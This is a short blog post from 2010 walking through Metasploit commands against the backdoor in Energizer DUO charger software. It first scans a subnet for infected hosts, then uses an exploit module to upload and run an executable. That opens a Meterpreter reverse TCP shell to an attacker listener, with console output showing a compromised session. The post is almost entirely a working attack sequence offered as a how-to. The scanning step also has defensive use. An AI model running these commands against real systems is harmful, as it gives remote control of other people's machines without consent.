Wednesday, 10 March 2010

How To Exploit the Energizer Trojan

As of release version 8749, you can now use Metasploit to locate infected systems on your local network using the following commands.

# msfconsole
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS 10.0.0.0/24
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run

[*] 10.0.0.23:7777 FOUND: [["F", "AUTOEXEC.BAT"] .......

To take things a step further and gain access to a system running this backdoor, use the energizer_duo_payload module:

msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST 10.0.0.23
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST 10.0.0.253
msf exploit(energizer_duo_payload) > exploit

[*] Started reverse handler on 10.0.0.23:4444
[*] Trying to upload C:\NTL0ZTL4DhVL.exe...
[*] Trying to execute C:\NTL0ZTL4DhVL.exe...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (10.0.0.23:4444 -> 10.0.0.253:1200)

meterpreter > getuid
Server username: HACKME\TestUser
